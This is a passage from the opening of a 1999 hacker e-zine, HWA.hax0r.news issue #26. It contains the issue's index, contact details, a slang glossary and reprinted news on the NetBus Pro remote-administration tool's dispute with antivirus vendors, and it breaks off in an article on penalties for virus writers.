[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                      <=-[ HWA.hax0r.news ]-=>                          =
==========================================================================
[=HWA'99=] Number 26 Volume 1 1999 July 24th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

http://www.fourmilab.to/hackdiet/www/hackdietf.html - The Hacker's Diet:
How to lose weight and hair through stress and poor nutrition

And joke of the week:
http://support.microsoft.com/support/kb/articles/q149/9/62.asp

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and
www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and
airportman for the Cubesoft bandwidth. Also shouts out to all our mirror
sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.harvard.edu/hwahaxornews/ * DOWN *
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (remember i'm doing this for
me, not you, the fact some people happen to get a kick/use out of it is of
secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN, nor
could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many sources
as possible and providing links to further info. It's a labour of love and
will be continued for as long as I feel like it; i'm not motivated by
dollars or the illusion of fame. Did you ever notice how the most
famous/infamous hackers are the ones that get caught? There's a lot to be
said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #26
=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty quiet,
we don't bite (usually) so if you're hanging out on irc stop by and idle a
while and say hi...

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
***                                                             ***
***  please join to discuss or impart news on techno/phac scene ***
***  stuff or just to hang out ... someone is usually around 24/7 ***
***                                                             ***
***  Note that the channel isn't there to entertain you its for ***
***  you to talk to us and impart news, if you're looking for fun ***
***  then do NOT join our channel try #weirdwigs or something... ***
***  we're not #chatzone or #hack                               ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
Issue #26
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. SOURCES
00.3 .. THIS IS WHO WE ARE
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
00.5 .. THE HWA_FAQ V1.0

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the Editor
03.0 .. NetBus suffers same industry pitfalls as Bo2k
04.0 .. Spreading Viruses Equal A Terrorist Attack
05.0 .. Y2K Bug Fixes May Cause Other Problems
06.0 .. Security Fears are Slowing UK E-Commerce
07.0 .. More Defc0n than you can shake three sticks at
08.0 .. How to Look Like a Hacker (quite hilarious really)
09.0 .. AV Vendors Still Scrambling Over BO2K
10.0 .. The Back Orifice 2000 Controversy
11.0 .. Year Old IIS Hole Still Causing Problems
12.0 .. NCIC 2000 Now Online
13.0 .. E-commerce Increases Security Risk
14.0 .. Cyberspace Relatively Safe
15.0 .. AntiOnline Under Investigation
16.0 .. Parse Defcon Video Available
17.0 .. cDc Challenges Microsoft to Recall SMS (wicked!)
18.0 .. BlackHat Insiders Want to Quit Security Biz
19.0 .. Attrition Closes Down Negation
20.0 .. ISS Offers Cracking Tools
21.0 .. IBM Researching Proactive Security
22.0 .. InET Issue #3
23.0 .. National ID Card Law Set to be Enacted
24.0 .. Local Agencies Not Concerned About Computer Intrusions
25.0 .. Microfraud Becomes Big Deal
26.0 .. China Arrests One After Posting to Internet
27.0 .. The Truth About Abe - MTV "Punk Hacker"
28.0 .. This is just silly: BO2Kfun Page Shut Down From Overuse
29.0 .. Man Sentenced for Using Cell Phone
30.0 .. HILLARY CLINTON AND HACKERS
31.0 .. SAMBA 2.0.5 SECURITY FIXES
32.0 .. SECURITY STANDARDS FOR BANKING
33.0 .. What makes UNIX users so smart?
34.0 .. Statement by Legions of the Underground Released
35.0 .. L0pht Releases Public Beta of AntiSniff
36.0 .. Bill to Limit Crypto Exports Approved
37.0 .. Russian and Ukrainian Govs Monitor Internet Communications
38.0 .. Here we go again, Mitnick to be Sentenced on Monday (Supposedly)
39.0 .. Virus Infestations on the Rise (?)
40.0 .. Do Handheld Electronics cause Problems with Avionics?
41.0 .. Alert: RDS IIS vulnerability/fix
42.0 .. Highschool crackers
43.0 .. Unauthorized Access to IIS Servers through ODBC Data Access with RDS
44.0 .. Whose fault is the Y2K bug?
45.0 .. CERT ADVISORY CA-99-09
46.0 .. Tracking Criminals With New Technology
47.0 .. 3Com HiPer Arcs Community Name Vulnerability
48.0 .. Aleph One in Tokyo
49.0 .. Windows2000 introduces Public Key Encryption
50.0 .. Remote OS detection via TCP/IP Stack FingerPrinting (Extra)

=--------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in
        return thats tres cool, if not we'll consider ur ad anyways so
        send it in. ads for other zines are ok too btw just mention us
        in yours, please remember to include links and an email contact.
        Corporate ads will be considered also and if your company wishes
        to donate to or participate in the upcoming Canc0n99 event send
        in your suggestions and ads now... n.b date and time may be pushed
        back, join mailing list for up to date information.
        Current dates: Aug19th-22nd Niagara Falls...

Ha.Ha .. Humour and puzzles
         Hey You!
         =------=
         Send in humour for this section! I need a laugh and its hard to
         find good stuff... ;)

SITE.1 .. Featured site
H.W    .. Hacked Websites
A.0    .. APPENDICES
A.1    .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA. IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF "ME EITHER"S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux
AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT NECESSARY
OR EXPECTED BUT ARE APPRECIATED; the current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY
NETIQUETTE IN ANY WAY. IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY;
current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS. IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL. THE LAYOUT AND
COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE
YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR.

- EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News
is news so i'll print any and all news but will quote sources when the
source is known; if its good enough for CNN its good enough for me. And i'm
doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings, a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc
etc well, now you can. (w00t) please no more inflatable sheep or plastic dog
droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal and
send a poor guy a postcard preferably one that has some scenery from your
place of residence for my collection, I collect stamps too so you kill two
birds with one stone by being cool and mailing in a postcard, return address
not necessary, just a "hey guys being cool in Bahrain, take it easy" will do
... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you)
  ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun
  or social engineering examples or transcripts thereof.
Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a
  burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in
  .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it.

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
     ~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor
listed in any degree of importance). Unless otherwise noted, like msgs from
lists or news from other sites, articles and information is compiled and or
sourced by Cruciphux, no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...

+other sites available on the HNN affiliates page, please see
 http://www.hackernews.com/affiliates.html as they seem to be popping up
 rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/            Electronic Underground Affiliation
http://ech0.cjb.net                   ech0 Security
http://axon.jccc.net/hir/             Hackers Information Report
http://net-security.org               Net Security
http://www.403-security.org           Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not and
may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it to
the drop box.

- Ed

Mailing List Subscription Info         (Far from complete)      Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~         ~~~~~~~~~~~~~~~~~~~      ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file)
started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body "subscribe bugtraq". I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible
for the words that you post on this list and that reproduction of those
words without your permission in any medium outside the distribution of
this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html.
Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He is
a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( ''   ''     ): Currently active/IRC+ man in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already, also
if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will
be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
***  /join #HWA.hax0r.news on EFnet the key is `zwen'           ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events its a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind, if you ever find out I may have
to get those hax0rs from 'Hackers' or the Praetorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?)
dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS
anymore. BTW to all you up and comers, i'd highly recommend you get that
book. Its almost like buying a clue. Anyway.. on with the show ..

- Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq, it won't
be reprinted unless changed in a big way with the exception of the following
excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed
below: Some are very useful, others attempt to deny any possible attempts
at eschewing obfuscation by obscuring their actual definitions.

@HWA    - see EoA ;-)

!=      - Mathematical notation "is not equal to" or "does not equal"
          ASC(247) "wavey equals" sign means "almost equal" to. If written
          as =/= (equals sign with a slash thru it) also means !=, =< is
          Equal to or less than and => is equal to or greater than (etc,
          this aint fucking grade school, cripes, don't believe I just
          typed all that..)

AAM     - Ask a minor (someone under age of adulthood, usually <16, <18 or
          <21)

AOL     - A great deal of people that got ripped off for net access by a
          huge clueless isp with sekurity that you can drive buses through,
          we're not talking Kung-Fu being none too good here, Buy-A-Kloo
          maybe at the least they could try leasing one??

*CC     - 1 - Credit Card (as in phraud)
          2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC     - Chaos Computer Club (Germany)

*CON    - Conference, a place hackers crackers and hax0rs among others go
          to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
          gear, get drunk watch videos and seminars, get drunk, listen to
          speakers, and last but not least, get drunk.
*CRACKER - 1. Someone who cracks games, encryption or codes, in popular
             hacker speak he's the guy that breaks into systems and is
             often (but by no means always) a "script kiddie" see pheer
          2. An edible biscuit usually crappy tasting without a nice dip,
             I like jalapeno pepper dip or chives sour cream and onion,
             yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger
          Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
          ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC     - End of Commentary

EoA     - End of Article or more commonly @HWA

EoF     - End of file

EoD     - End of diatribe (AOL'ers: look it up)

FUD     - Coined by Unknown and made famous by HNN - "Fear uncertainty and
          doubt", usually in general media articles not high brow articles
          such as ours or other HNN affiliates ;)

du0d    - a small furry animal that scurries over keyboards causing people
          to type weird crap on irc, hence when someone says something
          stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see
          HAX0R

*HAX0R  - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is
              difficult to define, I think it is best defined as pop
              culture's view on The Hacker ala movies such as well erhm
              "Hackers" and The Net etc... usually used by "real" hackers
              or crackers in a derogatory or slang humorous way, like
              'hax0r me some coffee?' or 'can you hax0r some bread on the
              way to the table please?'
          2 - A tool for cutting sheet metal.

HHN     - Maybe a bit confusing with HNN but we did spring to life around
          the same time too, HWA Hax0r News.... HHN is a part of HNN .. and
          HNN as a proper noun means the hackernews site proper. k? k.

HNN     - Hacker News Network and its affiliates
          http://www.hackernews.com/affiliates.html

J00     - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI - Missing on/from IRC

NFC     - Depends on context: No Further Comment or No Fucking Comment

NFR     - Network Flight Recorder (Do a websearch) see 0wn3d

NFW     - No fuckin' way

*0WN3D  - You are cracked and owned by an elite entity see pheer

*OFCS   - Oh for christ's sakes

PHACV   - And variations of same
          Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus,
          Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking
                      C - Carding
                      V - Virus
                      W - Warfare
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook
                          etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                      CT - Cyber Terrorism

*PHEER  - This is what you do when an ereet or elite person is in your
          presence see 0wn3d

*RTFM   - Read the fucking manual - not always applicable since some manuals
          are pure shit but if the answer you seek is indeed in the manual
          then you should have RTFM you dumb ass.

TBC     - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA     - To Be Arranged/To Be Announced also 2ba

TFS     - Tough fucking shit.

*w00t   - 1 - Reserved for the uber ereet, no one can say this without
              severe repercussions from the underground masses. also
              "w00ten"
          2 - Cruciphux and sAs72's second favourite word (they're both
              shit stirrers)

*wtf    - what the fuck, where the fuck, when the fuck etc ..

*ZEN    - The state you reach when you *think* you know everything (but
          really don't) usually shortly after reaching the ZEN like state
          something will break that you just 'fixed' or tweaked.

@HWA

-=-   :.   .:   -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like
to see more reader input, help me out here, whats good, what sucks etc, not
that I guarantee i'll take any notice mind you, but send in your thoughts
anyway.
* all the people who sent in cool emails and support

FProphet   Pyra   TwstdPair   _NeM_   D----Y   Dicentra   vexxation
sAs72   Spikeman   p0lix

Also shouts to;

kimblerj and xochitl13 who dropped off postcards, tnx guys!
Ken Williams/tattooman of PacketStorm, hang in there Ken...:(
& Kevin Mitnick (watch yer back)

kewl sites:

+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN ********* SEE AA.A
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always
popular..."
- FProphet '99

+++ When was the last time you backed up your important data?

++ NO DINERO, NO DOMAIN (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/20878.html

Network Solutions will demand advance payments for domain name
registrations in a move designed to squelch cyber-squatters. By Debbi
Gardiner.

Thanks to myself for providing the info from my wired news feed and others
from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

02.0 From the editor.
     ~~~~~~~~~~~~~~~~

#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");

    /*
     * Issue #26
     *
     * What can I say? the press is full of bullshit stories
     * about defcon and bo2k, guess nothing else happened
     * lately.... slim pickings indeed.
     *
     * hwa@press.usmc.net
     *
     */

    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main
address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can
go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to
cruciphux@dok.org

danke.

C*:.

03.0 NetBus suffers same industry pitfalls as Bo2k
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

NetBus Pro - Remote Admin Shareware or Evil Tool

contributed by sprfish

NetBus is facing similar problems as Back Orifice from AntiVirus companies.
NetBus, a $12 shareware program, is classified as a 'hacker tool' and is
detected and removed by all of the major AntiVirus software makers. The
authors of NetBus have contemplated suing the AV companies claiming that
they are trying to protect their own remote administration programs while
squashing the competition.

MSNBC
http://www.msnbc.com/news/290766.asp

NetBus maker to sue anti-virus firms?
Back Orifice-like tool is removed by virus software; authors say that's
hurting sales, and the tool's legit

By Bob Sullivan
MSNBC

July 16 - While one "remote administration tool," Back Orifice, stole
headlines last week, authors of another well-known back-door program,
NetBus Pro, were gearing up to sue for the right to sell it. Anti-virus
software currently detects and removes NetBus, another program that lets
intruders take control of a victim's PC from anywhere on the Internet.
NetBus Pro authors, who charge $12 for the product, say it's a legitimate
software tool. They might sue anti-virus vendors for interfering with their
right to sell it.

IT'S A STICKY STORY. The first version of NetBus was a favorite among
hackers - it even included easy ways to taunt victims, such as buttons to
open and close a victim's CD-ROM door.
Earlier this year, author Carl-Fredrik Neikter came out with an updated version, which he said was redesigned to be used as a professional “remote administration tool.” And he started charging a $12 registration fee.

But anti-virus software companies, noting that NetBus can still be used by hackers, treat the program like a virus. That makes NetBus and any anti-virus program incompatible, and NetBus Pro owners say that’s stifling their sales.

Even worse, according to Neikter’s partner Judson Spence, it’s anti-competitive — he says the anti-virus companies are squelching his product because it’s competition for their remote administration software. Symantec, which makes Norton’s AntiVirus Utility, sells remote administration tool PC Anywhere for $159.

“On its face, it looks like a good case,” said attorney Mark Rubin, who has been retained by NetBus. “The product belongs to a corporation. It’s designed to do a function. You’ve got another business telling people, ‘You can’t use that product’ ... You’ve got Symantec saying you shouldn’t use NetBus Pro. That’s the classic definition of an anti-competitive act.”

Members of the Cult of the Dead Cow, which authored Back Orifice, agree with Rubin’s premise. Back Orifice is also removed by anti-virus programs.

“It’s a huge problem for anybody who wants to use our product legitimately that they have to completely disable their AV software to use BO2K,” said a member calling himself Tweety Fish. “We’ve talked about suing them, but since our product is free, and we gain no income from what we do, the legal fees would probably be prohibitive. From what we can tell, we would have a pretty good case.”

Anti-virus companies say while this might be an interesting intellectual debate, it would be a silly court case. NetBus is a hacking tool, they say, designed to run on victims’ machines without their knowledge. The lawsuit would be frivolous, as it would be difficult to persuade a judge that NetBus is a legitimate software product.
“Our policy would be if they were to release a version which very clearly identifies itself as NetBus every time it ran, then we would not detect that,” said Stephen Trilling, director of research at Symantec’s Antivirus Research Center. Further, he said, Norton users are given an option when NetBus is detected — they can leave the software on their machine.

He denied Symantec would ever consider using Norton’s AntiVirus program to disable a competitive product. “We’re in the business of protecting customers,” he said.

The issue does have some shades of gray — when NetBus was released in February, Data Fellows’ F-Secure product initially didn’t detect the new NetBus, deferring to the notion it was a commercial product. But later, after customers complained, NetBus detection was added.

“Net administrators I know would get fired for using NetBus,” said Dan Takata, spokesman for Data Fellows. “It can be used for good, but it’s inherently a hacker program.”

That’s just not so, complains Spence, who says more than 700,000 copies of the program have been downloaded, and about 2,000 people have registered copies of the program. He says several corporations, and even the U.S. Air Force, are interested in using NetBus as an administration tool.

“I’m optimistic that once we raise the issue, legal departments [at AV companies] will act,” says Rubin. “Every day this costs money to NetBus Pro.”

@HWA

04.0 Spreading Viruses Equal A Terrorist Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by nvirB

Andre Gauthier, chairman of the Information Technology Association of Canada, thinks that people who create and/or spread viruses should be treated as terrorists and should have stiffer penalties applied to them. The ITAC recently requested the Canadian government increase the penalties for these types of crimes.
Edmonton Journal
http://www.edmontonjournal.com/technology/stories/990716/2615262.html

Get tough on computer-virus makers, Ottawa told
Rogue programs that play havoc with computer files seen as equivalent to a terrorist attack

Philip Demont
Southam Newspapers; Southam News

